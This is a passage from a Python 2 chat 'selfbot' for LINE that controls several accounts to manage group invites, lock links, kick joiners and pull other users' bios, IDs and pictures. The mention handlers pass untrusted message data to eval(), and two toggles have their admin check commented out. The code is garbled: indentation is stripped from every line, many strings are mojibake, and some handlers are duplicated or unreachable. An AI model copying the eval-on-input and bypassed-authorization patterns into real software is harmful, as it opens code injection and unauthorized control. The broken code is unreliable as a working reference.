details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
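# The Music handler below originally used `r` before assigning it. The fix
# assumes the same joox endpoint as the Lyric handler above, since the code
# unpacks the same song tuple layout (title, duration, download link, audio).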
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
# Assumption: the request below mirrors the Lyric handler's joox API call;
# the original referenced `r` without ever assigning it.
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting?")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
uye = random.choice(KAC)
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
uye = random.choice(KAC)
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "Groups List\n"
for i in gs:
L += "[»] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
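# Mention-based commands parse msg.contentMetadata["MENTION"], a JSON-like
# string, with eval() and read the target mid from MENTIONEES[0]["M"].
# json.loads would be a safer choice than eval here.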
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,"Bio not found")
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
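# "Mode on" is a convenience macro: it closes the group QR, rejects all
# pending invitations, and switches on every protection flag (Protectgr,
# Protectcancl, Protectjoin, protectionOn, qr, name lock, invite blocking
# and Protectcancel) that the individual commands further down toggle
# one at a time. "Mode off" mirrors it.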
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"?????????")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if msg.to in wait['pname']:
cl.sendText(msg.to,"Namelock already on.")
else:
cl.sendText(msg.to,"Namelock on")
wait['pname'][msg.to] = True
# mirrors the dedicated Namelock:on handler below
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"??O???? ????????O? O?")
if msg.to in protection:
cl.sendText(msg.to,"??????? Protect ??")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ?????? ??")
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.to in wait['pname']:
cl.sendText(msg.to,"???? Oƒƒ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"??????? Oƒƒ")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"??O???? ????????O? Oƒƒ")
except:
pass
if "Mode off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ?????? ???")
else:
cl.sendText(msg.to,"No have access Protect")
except:
pass
#==========================================================================
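# Note: the admin check in the next two handlers is commented out, so any
# chat member can toggle Protectcancel through "Invite on" / "Cancel off".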
elif msg.text in ["Invite on","invite on"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
#if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"?????? O?.")
else:
cl.sendText(msg.to,"??????? O?")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"???? Oƒƒ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"??????? Oƒƒ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"??O???? ????????O? O?")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"??O???? ????????O? Oƒƒ")
except:
pass
elif "Protect on" == msg.text:
if msg.to in protection:
cl.sendText(msg.to,"Protect ??????? ??")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ?????? ??")
elif "Protect off" == msg.text:
try:
if msg.from_ in admin:
protection.remove(msg.to)
cl.sendText(msg.to,"Protect ?????? ???")
else:
cl.sendText(msg.to,"Protect ??????? ???")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Tarik"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["winvite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim contact Boss")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite on","invite on"]:
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Invite off","Invite off"]:
if msg.from_ in admin:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Tidak Kami Kick")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join on","Auto join on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Join off","Auto join off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
wait["autoCancel"]["members"] = num
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°?组ç???¨è‡ªåŠ¨é‚€è¯·æ???’ç»?")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Leave off","Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif msg.text in ["menu","status"]:
if msg.from_ in admin:
md = "?Status Proteksi?\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["Protectcancel"] == True: md+="[•]Protect Cancel [On]\n"
else: md+="[•]Protect Cancel [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n?? ???+? ? ¥ûDÏ ? ?+??? ??\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "Album merit " in msg.text:
gid = msg.text.replace("Album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç???¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("Album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("Album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "Album removeat’" in msg.text:
gid = msg.text.replace("Album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Add on","Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["Add off","Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•?候語確èª?"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
